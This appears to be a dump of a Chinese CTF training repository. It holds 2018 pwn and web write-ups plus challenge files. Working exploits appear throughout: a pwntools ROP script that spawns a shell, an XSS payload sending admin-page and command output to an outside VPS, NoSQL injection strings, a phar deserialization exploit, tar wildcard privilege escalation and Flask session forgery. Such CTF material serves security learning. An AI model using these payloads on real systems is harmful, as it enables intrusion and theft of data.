--------------------------------------------------------------------------------
  1 | 一个格式化字符串，一个栈溢出。
  2 | 格式化字符串泄露cannay
  3 | 
  4 | 栈溢出那里直接给一个负数rop
  5 | 
  6 | -9223372036854775808
  7 | 
  8 | ```
  9 | gdb-peda$ x /20gx $rsp
 10 | 0x7fffffffdd30:	0x00000000004009e0	0x0000000000614c20
 11 | 0x7fffffffdd40:	0x3131313131313131	0x0000000000000000
 12 | 0x7fffffffdd50:	0x0000000000000000	0x00007ffff74ed439
 13 | 0x7fffffffdd60:	0x00007ffff783a620	0x00007ffff74e4dbd
 14 | 0x7fffffffdd70:	0x0000000000000000	0x4bf4d576e473ad00
 15 | 0x7fffffffdd80:	0x00007fffffffddc0	0x0000000000400ec9
 16 | 0x7fffffffdd90:	0x0000000000000000	0x0000000000000000
 17 | 0x7fffffffdda0:	0x0000000000400f40	0x0000000000400aa0
 18 | 0x7fffffffddb0:	0x00007fffffffdea0	0x0000000000000000
 19 | 0x7fffffffddc0:	0x0000000000400f40	0x00007ffff7495830
 20 | gdb-peda$ fmtarg 0x7fffffffdd78
 21 | The index of format argument : 15
 22 | ```
 23 | 
 24 | ```
 25 | gdb-peda$ x /10gx $rsp
 26 | 0x7fffffffdd30:	0x00000000004009e0	0x0000000000614c20
 27 | 0x7fffffffdd40:	0x3131313131313131	0x0000000000000000
 28 | 0x7fffffffdd50:	0x0000000000000000	0x00007ffff74ed439
 29 | 0x7fffffffdd60:	0x00007ffff783a620	0x00007ffff74e4dbd
 30 | 0x7fffffffdd70:	0x0000000000000000	0x4b79367d49f7c800
 31 | gdb-peda$ x /10gs 0xV
 32 | Invalid number "0xV".
 33 | gdb-peda$ x /10gs 0x614c20
 34 | warning: Unable to display strings with size 'g', using 'b' instead.
 35 | 0x614c20:	"11111111"
 36 | 0x614c29:	""
 37 | 0x614c2a:	""
 38 | 0x614c2b:	""
 39 | 0x614c2c:	""
 40 | 0x614c2d:	""
 41 | 0x614c2e:	""
 42 | 0x614c2f:	""
 43 | 0x614c30:	""
 44 | 0x614c31:	""
 45 | gdb-peda$ fmtarg 0x7fffffffdd38
 46 | The index of format argument : 7
 47 | ```
 48 | 
 49 | payload
 50 | ```python
 51 | #!/usr/bin/env python
 52 | #-*- coding:utf-8 -*-
 53 | from pwn import *
 54 | import time
 55 | import sys
 56 | 
 57 | context(arch = "amd64",os= "linux" )
 58 | context.log_level = 'DEBUG'
 59 | context.terminal = ['terminator', '-e']
 60 | target = "./exploit_1"
 61 | 
 62 | def pwn_it(status):
 63 |     if status==1:
 64 |         pwn=process(target,env={"LD_PRELOAD":"./libc.so.6"})
 65 |     else:
 66 |         pwn = remote("118.25.216.151",10001)
 67 | 
 68 |     def debug():
 69 |         gdb.attach(pwn,'''
 70 |         b * 0x400B96
 71 |         c
 72 |         ''')
 73 |     
 74 |     elf = ELF(target)
 75 | 
 76 |     pwn.recvuntil("name:")
 77 |     pwn.sendline("/bin/sh;%7$llxqqq%15$llx")
 78 |     pwn.recvuntil("/bin/sh;")
 79 |     p_sh = int(pwn.recvuntil("qqq")[:-3],16)
 80 |     print "p_sh="+hex(p_sh)
 81 |     cannry = int(pwn.recvuntil("please")[:-6],16)
 82 |     print "cannry="+hex(cannry)
 83 |     pwn.sendlineafter("motto:","-9223372036854775808")
 84 | 
 85 | 
 86 |     got_puts = elf.got['puts']
 87 |     plt_puts = elf.plt['puts']
 88 |     #0x0000000000400fa3 : pop rdi ; ret
 89 |     pop_rdi_addr = 0x400fa3
 90 |     payload = (0x410-8)*'\x00'+p64(cannry)+p64(0)+p64(pop_rdi_addr)+p64(got_puts)+p64(plt_puts)+p64(0x400DA0)
 91 |     pwn.sendlineafter("motto:",payload)
 92 |     puts_addr = u64(pwn.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
 93 |     libc = ELF("./libc.so.6")
 94 |     libc_base = puts_addr-libc.sym['puts']
 95 |     system_addr =libc_base+libc.sym['system'] 
 96 |     print "puts_addr="+hex(puts_addr)
 97 |     print "system_addr="+hex(system_addr)
 98 | 
 99 |     pwn.sendlineafter("motto:","-9223372036854775808")
100 |     payload = (0x410-8)*'\x00'+p64(cannry)+p64(0)+p64(pop_rdi_addr)+p64(p_sh)+p64(system_addr)
101 |     pwn.sendlineafter("motto:",payload)
102 |     pwn.interactive()
103 | 
104 | 
105 | if __name__ == "__main__":
106 |     pwn_it(int(sys.argv[1]))
107 | 
108 | ```
109 | 


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/webwp.md:
--------------------------------------------------------------------------------
  1 | ## 用优惠码买个X？
  2 | hint：flag在/flag中
  3 | 
  4 | 注册登陆会弹出一个15位的优惠码
  5 | ![](assets/webwp-5443d107.png)
  6 | 输入优惠码购买会提示：此优惠码已失效! 请重新输入24位长的优惠码,由此来完成您的购买！
  7 | 
  8 | 扫目录扫到www.zip，只给了一个source.php
  9 | ```php
 10 | <?php
 11 | //生成优惠码
 12 | $_SESSION['seed']=rand(0,999999999);
 13 | function youhuima(){
 14 |   mt_srand($_SESSION['seed']);
 15 |     $str_rand = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
 16 |     $auth='';
 17 |     $len=15;
 18 |     for ( $i = 0; $i < $len; $i++ ){
 19 |         if($i<=($len/2))
 20 |               $auth.=substr($str_rand,mt_rand(0, strlen($str_rand) - 1), 1);
 21 |         else
 22 |               $auth.=substr($str_rand,(mt_rand(0, strlen($str_rand) - 1))*-1, 1);
 23 |     }
 24 |     setcookie('Auth', $auth);
 25 | }
 26 | //support
 27 |   if (preg_match("/^d+.d+.d+.d+$/im",$ip)){
 28 |         if (!preg_match("/?|flag|}|cat|echo|*/i",$ip)){
 29 |                //执行命令
 30 |         }else {
 31 |               //flag字段和某些字符被过滤!
 32 |         }
 33 |   }else{
 34 |              // 你的输入不正确!
 35 |   }
 36 | ?>
 37 | ```
 38 | mt_srand()函数的随机数种子由rand(0,999999999)生成。然后用mt_rand(0,61)生成随机数来随机截取字符串$str_rand中的一个字符。因此我们只要得到mt_srand()函数的播种种子的值，就可以预测出24位的优惠码。
 39 | 这里可以参考wonderkun师傅的文章：[php的随机数的安全性分析](http://wonderkun.cc/index.html/?p=585)
 40 | 我们可以根据最终得到的字符串来反推出mt_rand()函数生成的15个随机数值，然后爆破出种子即可。
 41 | 
 42 | 这里用到了爆破种子的c语言程序php_mt_seed：http://www.openwall.com/php_mt_seed/
 43 | 
 44 | 然后用wonderkun师傅的脚本得到15个随机数并整理成该爆破程序所需要的格式
 45 | 
 46 | 因为我用15个爆破不出来，这里我只生成了前面的一部分随机数，不过并不会影响结果。
 47 | ```php
 48 | <?php
 49 | $str = "z9uDXeHLCJ7LqRq";
 50 | $randStr = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
 51 | $len=15;
 52 | for($i=0;$i<$len;$i++){
 53 |     if($i<=($len/2))
 54 |     {
 55 |         $pos = strpos($randStr,$str[$i]);
 56 |         echo $pos." ".$pos." "."0 ".(strlen($randStr)-1)." ";
 57 |     }
 58 | 
 59 |    //整理成方便 php_mt_seed 测试的格式
 60 |   //php_mt_seed VALUE_OR_MATCH_MIN [MATCH_MAX [RANGE_MIN RANGE_MAX]]
 61 | }
 62 | echo "n";
 63 | ?>
 64 | ```
 65 | 生成的值：
 66 | ```
 67 | 25 25 0 61 35 35 0 61 20 20 0 61 39 39 0 61 59 59 0 61 4 4 0 61 43 43 0 61 47 47 0 61
 68 | ```
 69 | 用php_mt_seed爆破出来一个种子
 70 | ![](assets/webwp-ee1e6186.png)
 71 | 然后把源码改成生成24位的
 72 | ```php
 73 | <?php
 74 | //生成优惠码
 75 | function youhuima(){
 76 |     mt_srand(104038799);
 77 |     $str_rand = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
 78 |     $auth='';
 79 |     $len=24;
 80 |     for ( $i = 0; $i < $len; $i++ ){
 81 |         if($i<=($len/2))
 82 |               $auth.=substr($str_rand,mt_rand(0, strlen($str_rand) - 1), 1);
 83 |         else
 84 |               $auth.=substr($str_rand,(mt_rand(0, strlen($str_rand) - 1))*-1, 1);
 85 |     }
 86 |     echo $auth;
 87 | }
 88 | youhuima();
 89 | ```
 90 | 这里注意，通过题目的响应包我发现题目环境为7.2的，所以这里需要用php7运行这段代码，生成24位优惠码。
 91 | ![](assets/webwp-5eb078e4.png)
 92 | ![](assets/webwp-62e01155.png)
 93 | 接下来就是RCE绕过，利用%0a绕过$
 94 | ![](assets/webwp-c2e27f84.png)
 95 | 
 96 | ## Injection???
 97 | 这道题的验证码是真的恶心。
 98 | 
 99 | 根据提示的info.php页面，看到php的mongodb扩展，并没有mysql扩展。所以猜测应该是mongodb注入。
100 | ![](assets/webwp-e8e9f208.png)
101 | 尝试admin，admin登陆。弹出username or password incorrect!，所以可以知道用户名是admin。
102 | 构造check.php?username=admin&password[$ne]=admin
103 | ![](assets/webwp-6e86a328.png)
104 | 应该是注入成功，但是返回了所有密码，并不能绕过登陆。但是这里可以用正则[$regex]盲注密码。
105 | 例如check.php?username=admin&password[$regex]=^a返回
106 | 
107 | ![](assets/webwp-74eab9af.png)
108 | 而check.php?username=admin&password[$regex]=^s返回
109 | ![](assets/webwp-971cb144.png)
110 | 说明存在s开头的密码，然后继续盲注即可，最后试出来密码为skmun。登陆即可获得flag。
111 | ![](assets/webwp-14aa208b.png)
112 | flag：swpuctf{1ts_N05ql_Inj3ction}
113 | 
114 | ## SimplePHP
115 | 提示 flag is in f1ag.php
116 | 
117 | file.php?file=可以任意文件读取。上传不存在绕过，主要看file.php和class.php。
118 | 
119 | file.php
120 | ```php
121 | <?php
122 | header("content-type:text/html;charset=utf-8");
123 | include 'function.php';
124 | include 'class.php';
125 | ini_set('open_basedir','/var/www/html/');
126 | $file = $_GET["file"] ? $_GET['file'] : "";
127 | if(empty($file)) {
128 |     echo "<h2>There is no file to show!<h2/>";
129 | }
130 | $show = new Show();
131 | if(file_exists($file)) {
132 |     $show->source = $file;
133 |     $show->_show();
134 | } else if (!empty($file)){
135 |     die('file doesn't exists.');
136 | }
137 | ?>
138 | ```
139 | 这里用了file_exists($file)判断文件是否存在，能够触发phar反序列化。
140 | 
141 | class.php
142 | ```php
143 | <?php
144 | class C1e4r
145 | {
146 |     public $test;
147 |     public $str;
148 |     public function __construct($name)
149 |     {
150 |         $this->str = $name;
151 |     }
152 |     public function __destruct()
153 |     {
154 |         $this->test = $this->str;
155 |         echo $this->test;
156 |     }
157 | }
158 | 
159 | 
160 | class Show
161 | {
162 |     public $source;
163 |     public $str;
164 |     public function __construct($file)
165 |     {
166 |         $this->source = $file;
167 |         echo $this->source;
168 |     }
169 |     public function __toString()
170 |     {
171 |         $content = $this->str['str']->source;
172 |         return $content;
173 |     }
174 |     public function __set($key,$value)
175 |     {
176 |         $this->$key = $value;
177 |     }
178 |     public function _show()
179 |     {
180 |         if(preg_match('/http|https|file:|gopher|dict|..|f1ag/i',$this->source)) {
181 |             die('hacker!');
182 |         } else {
183 |             highlight_file($this->source);
184 |         }
185 | 
186 |     }
187 |     public function __wakeup()
188 |     {
189 |         if(preg_match("/http|https|file:|gopher|dict|../i", $this->source)) {
190 |             echo "hacker~";
191 |             $this->source = "index.php";
192 |         }
193 |     }
194 | }
195 | class Test
196 | {
197 |     public $file;
198 |     public $params;
199 |     public function __construct()
200 |     {
201 |         $this->params = array();
202 |     }
203 |     public function __get($key)
204 |     {
205 |         return $this->get($key);
206 |     }
207 |     public function get($key)
208 |     {
209 |         if(isset($this->params[$key])) {
210 |             $value = $this->params[$key];
211 |         } else {
212 |             $value = "index.php";
213 |         }
214 |         return $this->file_get($value);
215 |     }
216 |     public function file_get($value)
217 |     {
218 |         $text = base64_encode(file_get_contents($value));
219 |         return $text;
220 |     }
221 | }
222 | ?>
223 | ```
224 | _show方法把f1agWAF掉了所以我们不能直接去读flag。
225 | 
226 | 但是Test类的get方法能够获取一个参数做为文件名，然后调用file_get方法返回文件内容的base64值。而且__get魔术方法调用了get方法。我们可以想办法触发__get魔术方法。
227 | ![](assets/webwp-5fc2bade.png)
228 | Show类的__toString魔术方法调用了未知对象的source属性，而对象str[‘str’]我们可控，因此我们可以传入Test对象去调用不存在的source属性来触发__get方法。
229 | ![](assets/webwp-ff3f7dad.png)
230 | 而C1e4r类的__destruct()方法可以用来触发Show类的__toString方法
231 | ![](assets/webwp-f89cee69.png)
232 | 最终的exp
233 | ```php
234 | <?php
235 | class C1e4r{
236 |     public $test;
237 |     public $str;
238 | }
239 | 
240 | class Show
241 | {
242 |     public $source;
243 |     public $str;
244 | }
245 | 
246 | class Test
247 | {
248 |     public $file;
249 |     public $params;
250 | 
251 | }
252 | 
253 | $a = new Test();
254 | $a->params = [
255 |     'source' => '/var/www/html/f1ag.php'
256 | ];
257 | 
258 | $b = new Show();
259 | $b->str['str'] = $a;
260 | 
261 | $c = new C1e4r();
262 | $c->str = $b;
263 | 
264 | $phar = new Phar("phar.phar"); //后缀名必须为phar
265 | $phar->startBuffering();
266 | $phar->setStub("<?php __HALT_COMPILER(); ?>");
267 | $phar->setMetadata($c); //将自定义的meta-data存入manifest
268 | $phar->addFromString("test.txt", "test"); //添加要压缩的文件
269 | //签名自动计算
270 | $phar->stopBuffering();
271 | 
272 | copy('phar.phar','exp.gif');
273 | 
274 | ?>
275 | ```
276 | 上传的最终文件路径为upload/md5(文件名+ip).jpg
277 | ![](assets/webwp-a5447514.png)
278 | 触发反序列化
279 | ![](assets/webwp-7e521145.png)
280 | ![](assets/webwp-b1ad87e0.png)
281 | flag：SWPUCTF{Php_un$eri4liz3_1s_Fu^!}
282 | 
283 | ## 有趣的邮箱注册
284 | 访问admin.php会显示只有localhost才能访问，估计是要用xss来进行ssrf。
285 | 
286 | 源码中发现check.php部分代码
287 | ```php
288 | <?php
289 | if($_POST['email']) {
290 | $email = $_POST['email'];
291 | if(!filter_var($email,FILTER_VALIDATE_EMAIL)){
292 | echo "error email, please check your email";
293 | }else{
294 | echo "等待管理员自动审核";
295 | echo $email;
296 | }
297 | }
298 | ?>
299 | ```
300 | 可以看到利用了FILTER_VALIDATE_EMAIL过滤器来过滤注册的邮箱，是不安全的。
301 | 
302 | 可以参考p神师傅的文章：https://www.leavesongs.com/PENETRATION/some-tricks-of-attacking-lnmp-web-application.html
303 | 邮箱地址分为local part和domain part两部分，local part中可以利用双引号来包含特殊字符。如”<svg/onload=alert(1)>”@example.com是合法的
304 | 
305 | 所以我们可以构造”<scRipt/src=http://yourvps/123.js></scriPt>”@qq.com进行xss。但是发现打到的cookie为空，所以只能利用ajax来读取后台页面。
306 | ```javascript
307 | xmlhttp=new XMLHttpRequest();
308 | xmlhttp.onreadystatechange=function()
309 | {
310 |     if (xmlhttp.readyState==4 && xmlhttp.status==200)
311 |     {
312 |         document.location='http://yourvps/?'+btoa(xmlhttp.responseText);
313 |     }
314 | }
315 | xmlhttp.open("POST","admin.php",true);
316 | xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
317 | xmlhttp.send();
318 | ```
319 | 在自己的vps上监听端口，即可收到请求。
320 | 
321 | 可以发现admin.php中有一个admin/a0a.php?cmd=whoami，明显的命令执行。但是一直弹不回来shell，不知道为什么，只好用ajax把命令执行的结果反弹回来。
322 | ![](assets/webwp-82d31b8a.png)
323 | 构造
324 | ```javascript
325 | xmlhttp=new XMLHttpRequest();
326 | xmlhttp.onreadystatechange=function()
327 | {
328 |     if (xmlhttp.readyState==4 && xmlhttp.status==200)
329 |     {
330 |         document.location='http://47.106.142.99:8012/?'+btoa(xmlhttp.responseText);
331 |     }
332 | }
333 | xmlhttp.open("POST","a0a.php?cmd=ls /",true);
334 | xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
335 | xmlhttp.send();
336 | ```
337 | ![](assets/webwp-1f42159a.png)
338 | 但是读取flag会发现返回为空，执行ls -al /发现flag文件属于flag用户，且其他用户无法读取。
339 | ![](assets/webwp-32e6e4be.png)
340 | 通过ls我们发现了一个MD5名字的目录，ls一下发现有upload.php，并且属于flag用户。
341 | ![](assets/webwp-bc510790.png)
342 | 访问页面，给了一个上传功能，一个备份功能。发现可以任意文件上传，上传php但是不可访问。备份点开可以发现是使用tar命令就行备份。
343 | ![](assets/webwp-807d3a06.png)
344 | shadow爷爷告诉我这里可以利用tar命令进行提权。参考：利用通配符进行Linux本地提权
345 | 
346 | 其实就是把文件名当作命令参数给执行了。
347 | 
348 | 将反弹shell的命令写入shell.sh，并上传。再接着上传两个文件–checkpoint-action=exec=sh shell.sh和–checkpoint=1，然后点击备份即可反弹shell。但是一直不能成功，按理说是没问题的，问了题目客服，他也说没问题。这就很迷了23333。
349 | 
350 | 最后把shell.sh内容改成
351 | ```bash
352 | cat /flag|base64
353 | ```
354 | 可以直接读取flag。
355 | ![](assets/webwp-999d3929.png)
356 | 
357 | ## 皇家线上赌场
358 | 登陆查看源码可以看到提示<!– /source –>以及/static?file=test.js弹出的xss，访问一下source可以看到一个目录树和views.py中的任意文件读取。
359 | ![](assets/webwp-ef91f632.png)
360 | 但是限制了..，我们只能用绝对路径去读取源码。
361 | ![](assets/webwp-24b1d07d.png)
362 | 通过读取/proc/self/mounts可以看到一个/home/ctf/web_assli3fasdf路径，但是里面读取不到views.py的内容。
363 | ![](assets/webwp-36b393dc.png)
364 | shadow爷爷告诉我/proc/self/cwd/app/views.py可以读
365 | ![](assets/webwp-3f1f76c0.png)
366 | ```python
367 | def register_views(app):
368 |     @app.before_request
369 |     def reset_account():
370 |         if request.path == '/signup' or request.path == '/login':
371 |             return
372 |         uname = username=session.get('username')
373 |         u = User.query.filter_by(username=uname).first()
374 |         if u:
375 |             g.u = u
376 |             g.flag = 'swpuctf{xxxxxxxxxxxxxx}'
377 |             if uname == 'admin':
378 |                 return
379 |             now = int(time())
380 |             if (now - u.ts >= 600):
381 |                 u.balance = 10000
382 |                 u.count = 0
383 |                 u.ts = now
384 |                 u.save()
385 |                 session['balance'] = 10000
386 |                 session['count'] = 0
387 | 
388 |     @app.route('/getflag', methods=('POST',))
389 |     @login_required
390 |     def getflag():
391 |         u = getattr(g, 'u')
392 |         if not u or u.balance < 1000000:
393 |             return '{"s": -1, "msg": "error"}'
394 |         field = request.form.get('field', 'username')
395 |         mhash = hashlib.sha256(('swpu++{0.' + field + '}').encode('utf-8')).hexdigest()
396 |         jdata = '{{"{0}":' + '"{1.' + field + '}", "hash": "{2}"}}'
397 |         return jdata.format(field, g.u, mhash)
398 | ```
399 | 还有一个__init__.py
400 | ```python
401 | from flask import Flask
402 | from flask_sqlalchemy import SQLAlchemy
403 | from .views import register_views
404 | from .models import db
405 | 
406 | 
407 | def create_app():
408 |     app = Flask(__name__, static_folder='')
409 |     app.secret_key = '9f516783b42730b7888008dd5c15fe66'
410 |     app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
411 |     register_views(app)
412 |     db.init_app(app)
413 |     return app
414 | ```
415 | 可以看到给了secret_key，可以用来伪造session。
416 | 
417 | 解密题目session
418 | ![](assets/webwp-e8c71ac5.png)
419 | 本地搭建环境使用secret_key伪造session，并把用户名改为admin来跳过balance的重置，访问getflag路由。
420 | ![](assets/webwp-b723271d.png)
421 | 然后使用User的save方法跳出g.u获取flag。
422 | ![](assets/webwp-3fff575c.png)
423 | 


--------------------------------------------------------------------------------
/2018/安恒9月赛/README.md:
--------------------------------------------------------------------------------
1 | ### Writeup
2 | 
3 | - [web,misc,crypto](https://www.anquanke.com/post/id/160582)
4 | 


--------------------------------------------------------------------------------
/2018/安恒9月赛/cpypto/Go（提交你找到的字符串的md5值）/5ba3589b6fd54.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/cpypto/Go（提交你找到的字符串的md5值）/5ba3589b6fd54.zip


--------------------------------------------------------------------------------
/2018/安恒9月赛/cpypto/简单加密/5ba3589b5a9bb.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/cpypto/简单加密/5ba3589b5a9bb.zip


--------------------------------------------------------------------------------
/2018/安恒9月赛/misc/Ditf（flag中的字符串md5后提交）/5ba358a2402eb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/misc/Ditf（flag中的字符串md5后提交）/5ba358a2402eb.png


--------------------------------------------------------------------------------
/2018/安恒9月赛/misc/crc/5ba358a26ec24.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/misc/crc/5ba358a26ec24.zip


--------------------------------------------------------------------------------
/2018/安恒9月赛/pwn/vm/5ba358a3c50d7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/pwn/vm/5ba358a3c50d7


--------------------------------------------------------------------------------
/2018/安恒9月赛/reverse/GodDriver/5ba358a45bd15:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/reverse/GodDriver/5ba358a45bd15


--------------------------------------------------------------------------------
/2018/安恒9月赛/reverse/NewDriver/5ba358a4689c8.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/reverse/NewDriver/5ba358a4689c8.exe


--------------------------------------------------------------------------------
/2018/安恒9月赛/web/babybypass/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | include 'flag.php';
 3 | if(isset($_GET['code'])){
 4 |     $code = $_GET['code'];
 5 |     if(strlen($code)>35){
 6 |         die("Long.");
 7 |     }
 8 |     if(preg_match("/[A-Za-z0-9_$]+/",$code)){
 9 |         die("NO.");
10 |     }
11 |     @eval($code);
12 | }else{
13 |     highlight_file(__FILE__);
14 | }
15 | //$hint =  "php function getFlag() to get flag";
16 | ?>


--------------------------------------------------------------------------------
/2018/安恒9月赛/web/神奇的CMS/You_Cant_Guess.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/安恒9月赛/web/神奇的CMS/You_Cant_Guess.zip


--------------------------------------------------------------------------------
/2018/安恒9月赛/web/神奇的CMS/新建文本文档.txt:
--------------------------------------------------------------------------------
1 | 神奇的CMS 管理员好像脑子不太好，记不住太复杂的密码


--------------------------------------------------------------------------------
/2018/护网杯/MISC/迟来的签到题/task_5.txt:
--------------------------------------------------------------------------------
1 | AAoHAR1WI1BRX1RQJ1AgJVdfI1VXJ1JTJ1BVXiIjVyRRIiMlJRs=
2 | 


--------------------------------------------------------------------------------
/2018/护网杯/REVERSE/APM233/dict.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/REVERSE/APM233/dict.pcapng


--------------------------------------------------------------------------------
/2018/护网杯/REVERSE/APM233/huwang.cap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/REVERSE/APM233/huwang.cap


--------------------------------------------------------------------------------
/2018/护网杯/REVERSE/RERERE/task_huwang-refinal-4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/REVERSE/RERERE/task_huwang-refinal-4.exe


--------------------------------------------------------------------------------
/2018/护网杯/REVERSE/fake-proc/task_Loader5.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/REVERSE/fake-proc/task_Loader5.exe


--------------------------------------------------------------------------------
/2018/护网杯/crypto/HuwangMailBox/task_huwang_mailbox.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity ^0.4.24;
 2 | 
 3 | contract HuWangMailBox {
 4 |     Mail[] drafts;
 5 |     address public owner;
 6 |     mapping(address => Mail[]) mails;
 7 |     
 8 |     constructor() public payable {
 9 |         owner = msg.sender;
10 |     }
11 | 
12 |     struct Mail {
13 |         bytes32 text;
14 |         address sender;
15 |     }
16 | 
17 |     function sendMail(address target, bytes32 text) public {
18 |         mails[target].push(Mail({text: text, sender: msg.sender}));
19 |     }
20 | 
21 |     function readMail(uint index) public view returns(address, bytes32) {
22 |         require(index < mails[msg.sender].length, "Wrong index");
23 |         return (mails[msg.sender][index].sender, mails[msg.sender][index].text);
24 |     }
25 | 
26 |     function modifyMail(address target, uint index, bytes32 text) public {
27 |         require(index < mails[target].length, "Wrong index");
28 |         require(msg.sender == mails[target][index].sender, "You are not the sender!");
29 |         mails[target][index].text = text;
30 |     }
31 | 
32 |     function mailCount() public view returns(uint) {
33 |         return mails[msg.sender].length;
34 |     }
35 | 
36 |     function dropLastMail() public {
37 |         require(mails[msg.sender].length > 0, "No more mails");
38 |         mails[msg.sender].length--;
39 |     }
40 | 
41 |     function saveDraft(bytes32 text) public {
42 |         Mail mail;
43 |         mail.text = text;
44 |         drafts.push(mail);
45 |     }
46 | 
47 |     function readDraft(uint index) public view returns(bytes32) {
48 |         require(index < drafts.length, "Wrong index");
49 |         return drafts[index].text;
50 |     }
51 | 
52 |     function draftCount() public view returns(uint) {
53 |         return drafts.length;
54 |     }
55 | 
56 |     function modifyDraft(uint index, bytes32 text) public {
57 |         require(index < drafts.length, "Wrong index");
58 |         drafts[index].text = text;
59 |     }
60 | }
61 | 


--------------------------------------------------------------------------------
/2018/护网杯/crypto/fez/5/fez.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/crypto/fez/5/fez.log


--------------------------------------------------------------------------------
/2018/护网杯/crypto/fez/5/fez.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | def xor(a,b):
 3 |     assert len(a)==len(b)
 4 |     c=""
 5 |     for i in range(len(a)):
 6 |         c+=chr(ord(a[i])^ord(b[i]))
 7 |     return c
 8 | def f(x,k):
 9 |     return xor(xor(x,k),7)
10 | def round(M,K):
11 |     L=M[0:27]
12 |     R=M[27:54]
13 |     new_l=R
14 |     new_r=xor(xor(R,L),K)
15 |     return new_l+new_r
16 | def fez(m,K):
17 |     for i in K:
18 |         m=round(m,i)
19 |     return m
20 | 
21 | K=[]
22 | for i in range(7):
23 |     K.append(os.urandom(27))
24 | m=open("flag","rb").read()
25 | assert len(m)<54
26 | m+=os.urandom(54-len(m))
27 | 
28 | test=os.urandom(54)
29 | print test.encode("hex")
30 | print fez(test,K).encode("hex")
31 | print fez(m,K).encode("hex")


--------------------------------------------------------------------------------
/2018/护网杯/crypto/wpa2/task_WPA2.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | import hmac
  4 | from hashlib import pbkdf2_hmac,sha1,md5
  5 | from Crypto.Cipher import AES
  6 | import string
  7 | import random
  8 | import struct
  9 | 
 10 | def PRF(key,A,B):
 11 | 	nByte = 48
 12 | 	i = 0
 13 | 	R = ''
 14 | 	
 15 | 	while ( i <= ((nByte*8 + 159)/160)):
 16 | 		hmacsha1 = hmac.new(key,A+"\x00" + B + chr(i),sha1)
 17 | 		R += hmacsha1.digest()
 18 | 		i += 1
 19 | 	return R[0:nByte]
 20 | 
 21 | def MakeAB(aNonce,sNonce,apMac,cliMac):
 22 | 	A = "Pairwise key expansion"
 23 | 	B = min(apMac,cliMac) + max(apMac,cliMac) + min(aNonce, sNonce) + max(aNonce, sNonce)
 24 | 	return (A,B)
 25 | 
 26 | def MakeKeys(pwd,ssid,A,B):
 27 | 	pmk = pbkdf2_hmac('sha1',pwd,ssid,4096,32)
 28 | 	
 29 | 	ptk = PRF(pmk,A,B)
 30 | 	
 31 | 	return (ptk,pmk)
 32 | def XOR(b1,b2,l):
 33 | 	if (len(b1)<l or len(b2)<l):
 34 | 		return None
 35 | 	res = ''
 36 | 	for i in range(l):
 37 | 		res += chr(ord(b1[i]) ^ ord(b2[i]))
 38 | 	if (len(b1)>l):
 39 | 		res += b1[l:]
 40 | 	return res
 41 | 
 42 | def EncryptCCMP(indata,TK,PN):
 43 |     if len(TK) != 16 or len(PN) != 6:
 44 |         return None
 45 | 
 46 |     is_a4 = (ord(indata[1]) & 0x03) == 3
 47 |     is_qos = (ord(indata[0]) & 0x8c) == 0x88
 48 | 
 49 |     z = 24 + 6 * (1 if is_a4 else 0)
 50 |     z += 2 * (1 if is_qos else 0)
 51 | 
 52 |     h80211 = list(indata)
 53 | 
 54 |     h80211[z + 0] = PN[5]
 55 |     h80211[z + 1] = PN[4]
 56 |     h80211[z + 2] = '\x00'
 57 |     h80211[z + 3] = '\x20'
 58 |     h80211[z + 4] = PN[3]
 59 |     h80211[z + 5] = PN[2]
 60 |     h80211[z + 6] = PN[1]
 61 |     h80211[z + 7] = PN[0]
 62 | 
 63 |     inputpkt = ''.join(h80211)
 64 | 
 65 |     data_len = len(inputpkt) - z - 8
 66 |     B0 = ''
 67 |     B0 += '\x59'
 68 |     B0 += '\x00'
 69 |     B0 += inputpkt[10:16]
 70 |     B0 += PN
